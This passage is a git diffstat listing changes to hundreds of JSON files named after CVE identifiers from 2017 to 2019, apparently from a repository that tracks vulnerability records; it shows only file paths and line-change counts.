2017/CVE-2017-11882.json | 99 ++- 2017/CVE-2017-11907.json | 3 +- 2017/CVE-2017-12149.json | 24 +- 2017/CVE-2017-1235.json | 3 +- 2017/CVE-2017-12426.json | 3 +- 2017/CVE-2017-12542.json | 6 +- 2017/CVE-2017-12561.json | 3 +- 2017/CVE-2017-12611.json | 3 +- 2017/CVE-2017-12615.json | 42 +- 2017/CVE-2017-12617.json | 30 +- 2017/CVE-2017-12624.json | 3 +- 2017/CVE-2017-12635.json | 6 +- 2017/CVE-2017-12636.json | 6 +- 2017/CVE-2017-12792.json | 3 +- 2017/CVE-2017-12852.json | 3 +- 2017/CVE-2017-12943.json | 6 +- 2017/CVE-2017-12945.json | 3 +- 2017/CVE-2017-13089.json | 6 +- 2017/CVE-2017-13156.json | 18 +- 2017/CVE-2017-13208.json | 3 +- 2017/CVE-2017-13253.json | 3 +- 2017/CVE-2017-13286.json | 3 +- 2017/CVE-2017-13672.json | 3 +- 2017/CVE-2017-13868.json | 3 +- 2017/CVE-2017-13872.json | 3 +- 2017/CVE-2017-14105.json | 3 +- 2017/CVE-2017-14262.json | 3 +- 2017/CVE-2017-14263.json | 3 +- 2017/CVE-2017-14322.json | 3 +- 2017/CVE-2017-14491.json | 3 +- 2017/CVE-2017-14493.json | 3 +- 2017/CVE-2017-14719.json | 3 +- 2017/CVE-2017-14948.json | 3 +- 2017/CVE-2017-14954.json | 3 +- 2017/CVE-2017-14980.json | 3 +- 2017/CVE-2017-15099.json | 3 +- 2017/CVE-2017-15120.json | 3 +- 2017/CVE-2017-15277.json | 3 +- 2017/CVE-2017-15303.json | 3 +- 2017/CVE-2017-15361.json | 18 +- 2017/CVE-2017-15394.json | 3 +- 2017/CVE-2017-15428.json | 3 +- 2017/CVE-2017-15708.json | 3 +- 2017/CVE-2017-15715.json | 3 +- 2017/CVE-2017-15944.json | 12 +- 2017/CVE-2017-15950.json | 3 +- 2017/CVE-2017-16082.json | 3 +- 2017/CVE-2017-16088.json | 3 +- 2017/CVE-2017-16245.json | 3 +- 2017/CVE-2017-1635.json | 6 +- 2017/CVE-2017-16524.json | 3 +- 2017/CVE-2017-16541.json | 3 +- 2017/CVE-2017-16567.json | 3 +- 2017/CVE-2017-16568.json | 3 +- 2017/CVE-2017-16651.json | 6 +- 2017/CVE-2017-16720.json | 3 +- 2017/CVE-2017-16744.json | 3 +- 2017/CVE-2017-16778.json | 3 +- 2017/CVE-2017-16806.json | 3 +- 2017/CVE-2017-16943.json | 3 +- 2017/CVE-2017-16994.json | 3 +- 2017/CVE-2017-16995.json | 39 +- 2017/CVE-2017-16997.json | 3 +- 2017/CVE-2017-17058.json | 3 +- 2017/CVE-2017-17099.json | 3 +- 2017/CVE-2017-17215.json | 9 +- 2017/CVE-2017-17275.json | 3 +- 2017/CVE-2017-17309.json | 3 +- 2017/CVE-2017-17485.json | 9 +- 2017/CVE-2017-17562.json | 15 +- 2017/CVE-2017-17692.json | 3 +- 2017/CVE-2017-17736.json | 3 +- 2017/CVE-2017-17917.json | 3 +- 2017/CVE-2017-18019.json | 3 +- 2017/CVE-2017-18044.json | 3 +- 2017/CVE-2017-18345.json | 3 +- 2017/CVE-2017-18349.json | 3 +- 2017/CVE-2017-18486.json | 3 +- 2017/CVE-2017-18635.json | 3 +- 2017/CVE-2017-20165.json | 3 +- 2017/CVE-2017-2368.json | 3 +- 2017/CVE-2017-2370.json | 12 +- 2017/CVE-2017-2388.json | 3 +- 2017/CVE-2017-2636.json | 3 +- 2017/CVE-2017-2666.json | 3 +- 2017/CVE-2017-2671.json | 3 +- 2017/CVE-2017-2741.json | 3 +- 2017/CVE-2017-2751.json | 3 +- 2017/CVE-2017-2793.json | 3 +- 2017/CVE-2017-2824.json | 3 +- 2017/CVE-2017-2903.json | 3 +- 2017/CVE-2017-3000.json | 3 +- 2017/CVE-2017-3066.json | 6 +- 2017/CVE-2017-3078.json | 3 +- 2017/CVE-2017-3143.json | 3 +- 2017/CVE-2017-3164.json | 3 +- 2017/CVE-2017-3241.json | 6 +- 2017/CVE-2017-3248.json | 9 +- 2017/CVE-2017-3506.json | 6 +- 2017/CVE-2017-3599.json | 6 +- 2017/CVE-2017-3730.json | 3 +- 2017/CVE-2017-3881.json | 15 +- 2017/CVE-2017-4490.json | 6 +- 2017/CVE-2017-4878.json | 3 +- 2017/CVE-2017-4971.json | 3 +- 2017/CVE-2017-5005.json | 3 +- 2017/CVE-2017-5007.json | 3 +- 2017/CVE-2017-5123.json | 18 +- 2017/CVE-2017-5124.json | 3 +- 2017/CVE-2017-5223.json | 3 +- 2017/CVE-2017-5415.json | 3 +- 2017/CVE-2017-5487.json | 27 +- 2017/CVE-2017-5633.json | 3 +- 2017/CVE-2017-5638.json | 210 ++++--- 2017/CVE-2017-5645.json | 6 +- 2017/CVE-2017-5689.json | 15 +- 2017/CVE-2017-5693.json | 3 +- 2017/CVE-2017-5715.json | 15 +- 2017/CVE-2017-5721.json | 3 +- 2017/CVE-2017-5753.json | 21 +- 2017/CVE-2017-5754.json | 18 +- 2017/CVE-2017-5792.json | 3 +- 2017/CVE-2017-5941.json | 12 +- 2017/CVE-2017-6008.json | 3 +- 2017/CVE-2017-6074.json | 6 +- 2017/CVE-2017-6079.json | 3 +- 2017/CVE-2017-6090.json | 3 +- 2017/CVE-2017-6206.json | 3 +- 2017/CVE-2017-6370.json | 3 +- 2017/CVE-2017-6516.json | 3 +- 2017/CVE-2017-6558.json | 3 +- 2017/CVE-2017-6640.json | 3 +- 2017/CVE-2017-6736.json | 6 +- 2017/CVE-2017-6913.json | 3 +- 2017/CVE-2017-6971.json | 6 +- 2017/CVE-2017-7038.json | 3 +- 2017/CVE-2017-7047.json | 6 +- 2017/CVE-2017-7089.json | 6 +- 2017/CVE-2017-7092.json | 3 +- 2017/CVE-2017-7173.json | 3 +- 2017/CVE-2017-7184.json | 6 +- 2017/CVE-2017-7188.json | 3 +- 2017/CVE-2017-7269.json | 63 +- 2017/CVE-2017-7308.json | 3 +- 2017/CVE-2017-7358.json | 3 +- 2017/CVE-2017-7374.json | 3 +- 2017/CVE-2017-7376.json | 3 +- 2017/CVE-2017-7410.json | 3 +- 2017/CVE-2017-7472.json | 3 +- 2017/CVE-2017-7494.json | 48 +- 2017/CVE-2017-75.json | 3 +- 2017/CVE-2017-7525.json | 18 +- 2017/CVE-2017-7529.json | 42 +- 2017/CVE-2017-7648.json | 3 +- 2017/CVE-2017-7651.json | 6 +- 2017/CVE-2017-7679.json | 3 +- 2017/CVE-2017-7912.json | 3 +- 2017/CVE-2017-7921.json | 42 +- 2017/CVE-2017-7998.json | 3 +- 2017/CVE-2017-8046.json | 30 +- 2017/CVE-2017-8225.json | 6 +- 2017/CVE-2017-8295.json | 9 +- 2017/CVE-2017-8367.json | 3 +- 2017/CVE-2017-8382.json | 3 +- 2017/CVE-2017-8464.json | 24 +- 2017/CVE-2017-8465.json | 3 +- 2017/CVE-2017-8529.json | 6 +- 2017/CVE-2017-8543.json | 3 +- 2017/CVE-2017-8570.json | 21 +- 2017/CVE-2017-8625.json | 3 +- 2017/CVE-2017-8641.json | 3 +- 2017/CVE-2017-8759.json | 51 +- 2017/CVE-2017-8760.json | 3 +- 2017/CVE-2017-8779.json | 3 +- 2017/CVE-2017-8802.json | 3 +- 2017/CVE-2017-8809.json | 3 +- 2017/CVE-2017-8890.json | 9 +- 2017/CVE-2017-8917.json | 27 +- 2017/CVE-2017-9096.json | 3 +- 2017/CVE-2017-9097.json | 3 +- 2017/CVE-2017-9101.json | 3 +- 2017/CVE-2017-9248.json | 21 +- 2017/CVE-2017-9417.json | 3 +- 2017/CVE-2017-9430.json | 6 +- 2017/CVE-2017-9476.json | 3 +- 2017/CVE-2017-9506.json | 9 +- 2017/CVE-2017-9544.json | 3 +- 2017/CVE-2017-9554.json | 6 +- 2017/CVE-2017-9606.json | 3 +- 2017/CVE-2017-9608.json | 3 +- 2017/CVE-2017-9609.json | 3 +- 2017/CVE-2017-9627.json | 3 +- 2017/CVE-2017-9757.json | 3 +- 2017/CVE-2017-9769.json | 3 +- 2017/CVE-2017-9779.json | 3 +- 2017/CVE-2017-9791.json | 9 +- 2017/CVE-2017-9798.json | 12 +- 2017/CVE-2017-9805.json | 48 +- 2017/CVE-2017-9822.json | 3 +- 2017/CVE-2017-9830.json | 3 +- 2017/CVE-2017-9833.json | 3 +- 2017/CVE-2017-9841.json | 39 +- 2017/CVE-2017-98505.json | 3 +- 2017/CVE-2017-9934.json | 3 +- 2017/CVE-2017-9947.json | 3 +- 2017/CVE-2017-9999.json | 3 +- 2018/CVE-2018-0101.json | 6 +- 2018/CVE-2018-0114.json | 30 +- 2018/CVE-2018-0171.json | 3 +- 2018/CVE-2018-0202.json | 3 +- 2018/CVE-2018-0208.json | 3 +- 2018/CVE-2018-0296.json | 12 +- 2018/CVE-2018-0708.json | 3 +- 2018/CVE-2018-0798.json | 3 +- 2018/CVE-2018-0802.json | 18 +- 2018/CVE-2018-0824.json | 3 +- 2018/CVE-2018-0834.json | 3 +- 2018/CVE-2018-0886.json | 3 +- 2018/CVE-2018-0952.json | 3 +- 2018/CVE-2018-0959.json | 3 +- 2018/CVE-2018-1000001.json | 6 +- 2018/CVE-2018-1000006.json | 3 +- 2018/CVE-2018-1000030.json | 3 +- 2018/CVE-2018-1000082.json | 3 +- 2018/CVE-2018-1000117.json | 3 +- 2018/CVE-2018-1000134.json | 3 +- 2018/CVE-2018-1000140.json | 6 +- 2018/CVE-2018-1000199.json | 3 +- 2018/CVE-2018-1000224.json | 3 +- 2018/CVE-2018-1000529.json | 3 +- 2018/CVE-2018-1000542.json | 3 +- 2018/CVE-2018-1000802.json | 3 +- 2018/CVE-2018-1000844.json | 3 +- 2018/CVE-2018-1000861.json | 6 +- 2018/CVE-2018-1002105.json | 15 +- 2018/CVE-2018-10097.json | 3 +- 2018/CVE-2018-1010.json | 3 +- 2018/CVE-2018-10118.json | 3 +- 2018/CVE-2018-1026.json | 3 +- 2018/CVE-2018-10299.json | 3 +- 2018/CVE-2018-10388.json | 3 +- 2018/CVE-2018-1042.json | 3 +- 2018/CVE-2018-10467.json | 3 +- 2018/CVE-2018-10517.json | 3 +- 2018/CVE-2018-10546.json | 3 +- 2018/CVE-2018-10562.json | 15 +- 2018/CVE-2018-10583.json | 6 +- 2018/CVE-2018-10715.json | 3 +- 2018/CVE-2018-10732.json | 3 +- 2018/CVE-2018-10821.json | 3 +- 2018/CVE-2018-1088.json | 3 +- 2018/CVE-2018-10920.json | 3 +- 2018/CVE-2018-10933.json | 113 ++-- 2018/CVE-2018-10936.json | 3 +- 2018/CVE-2018-10949.json | 3 +- 2018/CVE-2018-10993.json | 3 +- 2018/CVE-2018-1111.json | 9 +- 2018/CVE-2018-1123.json | 3 +- 2018/CVE-2018-11235.json | 60 +- 2018/CVE-2018-11311.json | 3 +- 2018/CVE-2018-11321.json | 3 +- 2018/CVE-2018-1133.json | 9 +- 2018/CVE-2018-11450.json | 3 +- 2018/CVE-2018-11510.json | 3 +- 2018/CVE-2018-11517.json | 3 +- 2018/CVE-2018-11564.json | 3 +- 2018/CVE-2018-1160.json | 3 +- 2018/CVE-2018-11631.json | 3 +- 2018/CVE-2018-11686.json | 3 +- 2018/CVE-2018-11759.json | 9 +- 2018/CVE-2018-11761.json | 3 +- 2018/CVE-2018-11770.json | 3 +- 2018/CVE-2018-11776.json | 51 +- 2018/CVE-2018-11784.json | 3 +- 2018/CVE-2018-11788.json | 3 +- 2018/CVE-2018-11790.json | 3 +- 2018/CVE-2018-12018.json | 3 +- 2018/CVE-2018-12031.json | 3 +- 2018/CVE-2018-12038.json | 3 +- 2018/CVE-2018-1207.json | 6 +- 2018/CVE-2018-12086.json | 3 +- 2018/CVE-2018-12326.json | 3 +- 2018/CVE-2018-1235.json | 3 +- 2018/CVE-2018-12386.json | 6 +- 2018/CVE-2018-12418.json | 3 +- 2018/CVE-2018-12421.json | 3 +- 2018/CVE-2018-12463.json | 3 +- 2018/CVE-2018-12533.json | 6 +- 2018/CVE-2018-12537.json | 3 +- 2018/CVE-2018-12540.json | 6 +- 2018/CVE-2018-1259.json | 3 +- 2018/CVE-2018-12596.json | 3 +- 2018/CVE-2018-12597.json | 3 +- 2018/CVE-2018-12598.json | 3 +- 2018/CVE-2018-12613.json | 9 +- 2018/CVE-2018-1263.json | 3 +- 2018/CVE-2018-12636.json | 3 +- 2018/CVE-2018-1270.json | 15 +- 2018/CVE-2018-1273.json | 15 +- 2018/CVE-2018-12798.json | 3 +- 2018/CVE-2018-1285.json | 3 +- 2018/CVE-2018-1288.json | 3 +- 2018/CVE-2018-12895.json | 3 +- 2018/CVE-2018-1297.json | 6 +- 2018/CVE-2018-1304.json | 6 +- 2018/CVE-2018-1305.json | 3 +- 2018/CVE-2018-1306.json | 3 +- 2018/CVE-2018-1311.json | 3 +- 2018/CVE-2018-1313.json | 3 +- 2018/CVE-2018-1324.json | 3 +- 2018/CVE-2018-13257.json | 3 +- 2018/CVE-2018-13341.json | 6 +- 2018/CVE-2018-1335.json | 15 +- 2018/CVE-2018-13379.json | 30 +- 2018/CVE-2018-13382.json | 6 +- 2018/CVE-2018-13410.json | 3 +- 2018/CVE-2018-13784.json | 3 +- 2018/CVE-2018-13797.json | 3 +- 2018/CVE-2018-13864.json | 3 +- 2018/CVE-2018-14.json | 3 +- 2018/CVE-2018-14009.json | 3 +- 2018/CVE-2018-14040.json | 3 +- 2018/CVE-2018-14041.json | 3 +- 2018/CVE-2018-14042.json | 3 +- 2018/CVE-2018-14083.json | 3 +- 2018/CVE-2018-14442.json | 6 +- 2018/CVE-2018-14463.json | 3 +- 2018/CVE-2018-14469.json | 3 +- 2018/CVE-2018-14634.json | 3 +- 2018/CVE-2018-14665.json | 6 +- 2018/CVE-2018-14667.json | 18 +- 2018/CVE-2018-14699.json | 3 +- 2018/CVE-2018-14714.json | 9 +- 2018/CVE-2018-14716.json | 3 +- 2018/CVE-2018-14729.json | 3 +- 2018/CVE-2018-14772.json | 3 +- 2018/CVE-2018-14847.json | 33 +- 2018/CVE-2018-14879.json | 3 +- 2018/CVE-2018-14880.json | 3 +- 2018/CVE-2018-15131.json | 3 +- 2018/CVE-2018-15133.json | 33 +- 2018/CVE-2018-15139.json | 3 +- 2018/CVE-2018-15365.json | 3 +- 2018/CVE-2018-15473.json | 96 ++- 2018/CVE-2018-15499.json | 3 +- 2018/CVE-2018-15686.json | 3 +- 2018/CVE-2018-15708.json | 3 +- 2018/CVE-2018-15727.json | 6 +- 2018/CVE-2018-15832.json | 3 +- 2018/CVE-2018-15835.json | 3 +- 2018/CVE-2018-15877.json | 6 +- 2018/CVE-2018-15912.json | 3 +- 2018/CVE-2018-15961.json | 15 +- 2018/CVE-2018-15968.json | 3 +- 2018/CVE-2018-15982.json | 24 +- 2018/CVE-2018-16119.json | 3 +- 2018/CVE-2018-16156.json | 3 +- 2018/CVE-2018-16167.json | 3 +- 2018/CVE-2018-16283.json | 3 +- 2018/CVE-2018-16323.json | 3 +- 2018/CVE-2018-16341.json | 6 +- 2018/CVE-2018-16370.json | 3 +- 2018/CVE-2018-16373.json | 3 +- 2018/CVE-2018-16431.json | 3 +- 2018/CVE-2018-16492.json | 3 +- 2018/CVE-2018-16509.json | 12 +- 2018/CVE-2018-16706.json | 3 +- 2018/CVE-2018-16711.json | 3 +- 2018/CVE-2018-16712.json | 3 +- 2018/CVE-2018-16713.json | 3 +- 2018/CVE-2018-16763.json | 42 +- 2018/CVE-2018-16809.json | 3 +- 2018/CVE-2018-16843.json | 3 +- 2018/CVE-2018-16854.json | 3 +- 2018/CVE-2018-16858.json | 12 +- 2018/CVE-2018-16875.json | 3 +- 2018/CVE-2018-16890.json | 3 +- 2018/CVE-2018-16987.json | 3 +- 2018/CVE-2018-17081.json | 3 +- 2018/CVE-2018-17144.json | 6 +- 2018/CVE-2018-17182.json | 12 +- 2018/CVE-2018-17207.json | 3 +- 2018/CVE-2018-17240.json | 6 +- 2018/CVE-2018-17246.json | 3 +- 2018/CVE-2018-17254.json | 6 +- 2018/CVE-2018-17418.json | 3 +- 2018/CVE-2018-17431.json | 6 +- 2018/CVE-2018-17456.json | 18 +- 2018/CVE-2018-17463.json | 6 +- 2018/CVE-2018-17552.json | 3 +- 2018/CVE-2018-17553.json | 3 +- 2018/CVE-2018-17873.json | 3 +- 2018/CVE-2018-17924.json | 3 +- 2018/CVE-2018-17961.json | 3 +- 2018/CVE-2018-18026.json | 3 +- 2018/CVE-2018-18333.json | 3 +- 2018/CVE-2018-18368.json | 3 +- 2018/CVE-2018-18387.json | 3 +- 2018/CVE-2018-18500.json | 3 +- 2018/CVE-2018-18649.json | 3 +- 2018/CVE-2018-18714.json | 3 +- 2018/CVE-2018-18778.json | 6 +- 2018/CVE-2018-18852.json | 6 +- 2018/CVE-2018-18893.json | 3 +- 2018/CVE-2018-18925.json | 3 +- 2018/CVE-2018-18955.json | 3 +- 2018/CVE-2018-19052.json | 3 +- 2018/CVE-2018-19126.json | 3 +- 2018/CVE-2018-19127.json | 3 +- 2018/CVE-2018-19131.json | 3 +- 2018/CVE-2018-19207.json | 6 +- 2018/CVE-2018-19246.json | 3 +- 2018/CVE-2018-19276.json | 3 +- 2018/CVE-2018-1932.json | 3 +- 2018/CVE-2018-19320.json | 9 +- 2018/CVE-2018-19321.json | 6 +- 2018/CVE-2018-19410.json | 3 +- 2018/CVE-2018-19422.json | 6 +- 2018/CVE-2018-19466.json | 3 +- 2018/CVE-2018-19487.json | 3 +- 2018/CVE-2018-19518.json | 6 +- 2018/CVE-2018-19537.json | 3 +- 2018/CVE-2018-19571.json | 9 +- 2018/CVE-2018-19592.json | 3 +- 2018/CVE-2018-19788.json | 12 +- 2018/CVE-2018-19859.json | 3 +- 2018/CVE-2018-19911.json | 3 +- 2018/CVE-2018-19987.json | 3 +- 2018/CVE-2018-1999002.json | 9 +- 2018/CVE-2018-20062.json | 6 +- 2018/CVE-2018-20148.json | 3 +- 2018/CVE-2018-20162.json | 3 +- 2018/CVE-2018-20165.json | 3 +- 2018/CVE-2018-20250.json | 57 +- 2018/CVE-2018-20343.json | 3 +- 2018/CVE-2018-20377.json | 3 +- 2018/CVE-2018-20433.json | 3 +- 2018/CVE-2018-20434.json | 3 +- 2018/CVE-2018-20463.json | 3 +- 2018/CVE-2018-20555.json | 3 +- 2018/CVE-2018-20580.json | 3 +- 2018/CVE-2018-20718.json | 3 +- 2018/CVE-2018-20966.json | 3 +- 2018/CVE-2018-2380.json | 3 +- 2018/CVE-2018-2392.json | 3 +- 2018/CVE-2018-25031.json | 33 +- 2018/CVE-2018-25032.json | 9 +- 2018/CVE-2018-25075.json | 3 +- 2018/CVE-2018-2628.json | 66 +- 2018/CVE-2018-2636.json | 6 +- 2018/CVE-2018-2844.json | 3 +- 2018/CVE-2018-2879.json | 9 +- 2018/CVE-2018-2893.json | 21 +- 2018/CVE-2018-2894.json | 12 +- 2018/CVE-2018-3191.json | 15 +- 2018/CVE-2018-3245.json | 9 +- 2018/CVE-2018-3252.json | 9 +- 2018/CVE-2018-3260.json | 3 +- 2018/CVE-2018-3295.json | 6 +- 2018/CVE-2018-3608.json | 3 +- 2018/CVE-2018-3639.json | 12 +- 2018/CVE-2018-3760.json | 6 +- 2018/CVE-2018-3783.json | 3 +- 2018/CVE-2018-3786.json | 3 +- 2018/CVE-2018-3810.json | 9 +- 2018/CVE-2018-3811.json | 3 +- 2018/CVE-2018-4013.json | 6 +- 2018/CVE-2018-4084.json | 3 +- 2018/CVE-2018-4087.json | 9 +- 2018/CVE-2018-4110.json | 3 +- 2018/CVE-2018-4121.json | 9 +- 2018/CVE-2018-4124.json | 3 +- 2018/CVE-2018-4150.json | 9 +- 2018/CVE-2018-4185.json | 9 +- 2018/CVE-2018-4193.json | 3 +- 2018/CVE-2018-4233.json | 3 +- 2018/CVE-2018-4241.json | 3 +- 2018/CVE-2018-4242.json | 3 +- 2018/CVE-2018-4243.json | 3 +- 2018/CVE-2018-4248.json | 3 +- 2018/CVE-2018-4280.json | 6 +- 2018/CVE-2018-4327.json | 6 +- 2018/CVE-2018-4330.json | 3 +- 2018/CVE-2018-4331.json | 3 +- 2018/CVE-2018-4343.json | 3 +- 2018/CVE-2018-4407.json | 48 +- 2018/CVE-2018-4411.json | 3 +- 2018/CVE-2018-4415.json | 3 +- 2018/CVE-2018-4416.json | 3 +- 2018/CVE-2018-4431.json | 3 +- 2018/CVE-2018-4441.json | 3 +- 2018/CVE-2018-4878.json | 33 +- 2018/CVE-2018-4879.json | 3 +- 2018/CVE-2018-4901.json | 3 +- 2018/CVE-2018-5146.json | 3 +- 2018/CVE-2018-5158.json | 6 +- 2018/CVE-2018-5234.json | 6 +- 2018/CVE-2018-5333.json | 3 +- 2018/CVE-2018-5353.json | 3 +- 2018/CVE-2018-5354.json | 3 +- 2018/CVE-2018-5711.json | 6 +- 2018/CVE-2018-5728.json | 3 +- 2018/CVE-2018-5740.json | 3 +- 2018/CVE-2018-5767.json | 6 +- 2018/CVE-2018-5873.json | 3 +- 2018/CVE-2018-5951.json | 3 +- 2018/CVE-2018-5955.json | 9 +- 2018/CVE-2018-6065.json | 3 +- 2018/CVE-2018-6066.json | 3 +- 2018/CVE-2018-6242.json | 15 +- 2018/CVE-2018-6341.json | 3 +- 2018/CVE-2018-6376.json | 3 +- 2018/CVE-2018-6389.json | 63 +- 2018/CVE-2018-6396.json | 3 +- 2018/CVE-2018-6407.json | 3 +- 2018/CVE-2018-6479.json | 6 +- 2018/CVE-2018-6518.json | 3 +- 2018/CVE-2018-6546.json | 3 +- 2018/CVE-2018-6574.json | 270 ++++++--- 2018/CVE-2018-6622.json | 3 +- 2018/CVE-2018-6643.json | 3 +- 2018/CVE-2018-6789.json | 12 +- 2018/CVE-2018-6791.json | 3 +- 2018/CVE-2018-6890.json | 3 +- 2018/CVE-2018-6892.json | 9 +- 2018/CVE-2018-6905.json | 6 +- 2018/CVE-2018-6961.json | 6 +- 2018/CVE-2018-6981.json | 3 +- 2018/CVE-2018-7171.json | 3 +- 2018/CVE-2018-7197.json | 3 +- 2018/CVE-2018-7211.json | 3 +- 2018/CVE-2018-7249.json | 3 +- 2018/CVE-2018-7250.json | 3 +- 2018/CVE-2018-7273.json | 3 +- 2018/CVE-2018-7284.json | 3 +- 2018/CVE-2018-7422.json | 9 +- 2018/CVE-2018-7448.json | 3 +- 2018/CVE-2018-7449.json | 3 +- 2018/CVE-2018-7489.json | 3 +- 2018/CVE-2018-7490.json | 3 +- 2018/CVE-2018-7600.json | 108 ++-- 2018/CVE-2018-7602.json | 15 +- 2018/CVE-2018-7669.json | 3 +- 2018/CVE-2018-7690.json | 3 +- 2018/CVE-2018-7691.json | 3 +- 2018/CVE-2018-7747.json | 3 +- 2018/CVE-2018-7750.json | 3 +- 2018/CVE-2018-7842.json | 3 +- 2018/CVE-2018-7843.json | 3 +- 2018/CVE-2018-7844.json | 3 +- 2018/CVE-2018-7845.json | 3 +- 2018/CVE-2018-7846.json | 3 +- 2018/CVE-2018-7848.json | 3 +- 2018/CVE-2018-7849.json | 3 +- 2018/CVE-2018-7852.json | 3 +- 2018/CVE-2018-7854.json | 3 +- 2018/CVE-2018-7935.json | 3 +- 2018/CVE-2018-8004.json | 3 +- 2018/CVE-2018-8021.json | 3 +- 2018/CVE-2018-8032.json | 3 +- 2018/CVE-2018-8033.json | 3 +- 2018/CVE-2018-8038.json | 3 +- 2018/CVE-2018-8039.json | 3 +- 2018/CVE-2018-8045.json | 3 +- 2018/CVE-2018-8060.json | 3 +- 2018/CVE-2018-8062.json | 3 +- 2018/CVE-2018-8065.json | 3 +- 2018/CVE-2018-8078.json | 3 +- 2018/CVE-2018-8090.json | 3 +- 2018/CVE-2018-8097.json | 3 +- 2018/CVE-2018-8108.json | 3 +- 2018/CVE-2018-8115.json | 3 +- 2018/CVE-2018-8120.json | 30 +- 2018/CVE-2018-8172.json | 3 +- 2018/CVE-2018-8174.json | 45 +- 2018/CVE-2018-8208.json | 3 +- 2018/CVE-2018-8214.json | 3 +- 2018/CVE-2018-8284.json | 3 +- 2018/CVE-2018-8353.json | 3 +- 2018/CVE-2018-8389.json | 3 +- 2018/CVE-2018-8410.json | 3 +- 2018/CVE-2018-8414.json | 3 +- 2018/CVE-2018-8420.json | 3 +- 2018/CVE-2018-8440.json | 3 +- 2018/CVE-2018-8453.json | 9 +- 2018/CVE-2018-8495.json | 3 +- 2018/CVE-2018-8581.json | 9 +- 2018/CVE-2018-8587.json | 3 +- 2018/CVE-2018-8611.json | 3 +- 2018/CVE-2018-8617.json | 3 +- 2018/CVE-2018-8639.json | 6 +- 2018/CVE-2018-8718.json | 3 +- 2018/CVE-2018-8820.json | 3 +- 2018/CVE-2018-8897.json | 12 +- 2018/CVE-2018-8941.json | 3 +- 2018/CVE-2018-8947.json | 3 +- 2018/CVE-2018-8970.json | 3 +- 2018/CVE-2018-9059.json | 3 +- 2018/CVE-2018-9075.json | 3 +- 2018/CVE-2018-9160.json | 3 +- 2018/CVE-2018-9206.json | 12 +- 2018/CVE-2018-9207.json | 3 +- 2018/CVE-2018-9208.json | 3 +- 2018/CVE-2018-9276.json | 9 +- 2018/CVE-2018-9375.json | 3 +- 2018/CVE-2018-9411.json | 3 +- 2018/CVE-2018-9468.json | 3 +- 2018/CVE-2018-9493.json | 3 +- 2018/CVE-2018-9539.json | 3 +- 2018/CVE-2018-9546.json | 3 +- 2018/CVE-2018-9948.json | 6 +- 2018/CVE-2018-9950.json | 3 +- 2018/CVE-2018-9951.json | 3 +- 2018/CVE-2018-9958.json | 3 +- 2018/CVE-2018-9995.json | 81 ++- 2019/CVE-2019-0053.json | 3 +- 2019/CVE-2019-0162.json | 3 +- 2019/CVE-2019-0192.json | 6 +- 2019/CVE-2019-0193.json | 15 +- 2019/CVE-2019-0211.json | 3 +- 2019/CVE-2019-0217.json | 3 +- 2019/CVE-2019-0227.json | 3 +- 2019/CVE-2019-0230.json | 15 +- 2019/CVE-2019-0232.json | 24 +- 2019/CVE-2019-0539.json | 3 +- 2019/CVE-2019-0567.json | 6 +- 2019/CVE-2019-0604.json | 21 +- 2019/CVE-2019-0623.json | 3 +- 2019/CVE-2019-0678.json | 3 +- 2019/CVE-2019-0708.json | 357 +++++++---- 2019/CVE-2019-0709.json | 9 +- 2019/CVE-2019-0752.json | 3 +- 2019/CVE-2019-0768.json | 3 +- 2019/CVE-2019-0785.json | 3 +- 2019/CVE-2019-0803.json | 6 +- 2019/CVE-2019-0808.json | 12 +- 2019/CVE-2019-0841.json | 12 +- 2019/CVE-2019-0859.json | 3 +- 2019/CVE-2019-0887.json | 6 +- 2019/CVE-2019-0888.json | 3 +- 2019/CVE-2019-0986.json | 3 +- 2019/CVE-2019-10008.json | 3 +- 2019/CVE-2019-1002101.json | 3 +- 2019/CVE-2019-1003000.json | 15 +- 2019/CVE-2019-1006.json | 3 +- 2019/CVE-2019-10086.json | 3 +- 2019/CVE-2019-10092.json | 6 +- 2019/CVE-2019-1010054.json | 3 +- 2019/CVE-2019-1010268.json | 3 +- 2019/CVE-2019-1010298.json | 3 +- 2019/CVE-2019-10149.json | 45 +- 2019/CVE-2019-10172.json | 3 +- 2019/CVE-2019-1020010.json | 3 +- 2019/CVE-2019-10207.json | 3 +- 2019/CVE-2019-10220.json | 6 +- 2019/CVE-2019-10392.json | 6 +- 2019/CVE-2019-1040.json | 15 +- 2019/CVE-2019-10475.json | 3 +- 2019/CVE-2019-1064.json | 9 +- 2019/CVE-2019-10678.json | 3 +- 2019/CVE-2019-1068.json | 3 +- 2019/CVE-2019-10685.json | 3 +- 2019/CVE-2019-1069.json | 3 +- 2019/CVE-2019-10708.json | 3 +- 2019/CVE-2019-10742.json | 3 +- 2019/CVE-2019-10758.json | 6 +- 2019/CVE-2019-10760.json | 3 +- 2019/CVE-2019-10779.json | 3 +- 2019/CVE-2019-1083.json | 3 +- 2019/CVE-2019-10869.json | 3 +- 2019/CVE-2019-10915.json | 3 +- 2019/CVE-2019-10945.json | 3 +- 2019/CVE-2019-1096.json | 3 +- 2019/CVE-2019-10999.json | 6 +- 2019/CVE-2019-11043.json | 66 +- 2019/CVE-2019-11061.json | 3 +- 2019/CVE-2019-11076.json | 3 +- 2019/CVE-2019-1108.json | 3 +- 2019/CVE-2019-11157.json | 3 +- 2019/CVE-2019-11223.json | 3 +- 2019/CVE-2019-11224.json | 3 +- 2019/CVE-2019-1125.json | 3 +- 2019/CVE-2019-1132.json | 6 +- 2019/CVE-2019-11358.json | 18 +- 2019/CVE-2019-11395.json | 6 +- 2019/CVE-2019-11408.json | 3 +- 2019/CVE-2019-11447.json | 27 +- 2019/CVE-2019-11477.json | 3 +- 2019/CVE-2019-11510.json | 39 +- 2019/CVE-2019-11523.json | 3 +- 2019/CVE-2019-11539.json | 3 +- 2019/CVE-2019-11580.json | 6 +- 2019/CVE-2019-11581.json | 9 +- 2019/CVE-2019-11687.json | 3 +- 2019/CVE-2019-11707.json | 6 +- 2019/CVE-2019-11708.json | 3 +- 2019/CVE-2019-11730.json | 3 +- 2019/CVE-2019-1181.json | 3 +- 2019/CVE-2019-11881.json | 3 +- 2019/CVE-2019-11931.json | 6 +- 2019/CVE-2019-11932.json | 63 +- 2019/CVE-2019-11933.json | 6 +- 2019/CVE-2019-12086.json | 6 +- 2019/CVE-2019-1215.json | 3 +- 2019/CVE-2019-12169.json | 3 +- 2019/CVE-2019-12170.json | 3 +- 2019/CVE-2019-1218.json | 3 +- 2019/CVE-2019-12180.json | 3 +- 2019/CVE-2019-12181.json | 3 +- 2019/CVE-2019-12185.json | 3 +- 2019/CVE-2019-12189.json | 3 +- 2019/CVE-2019-1221.json | 3 +- 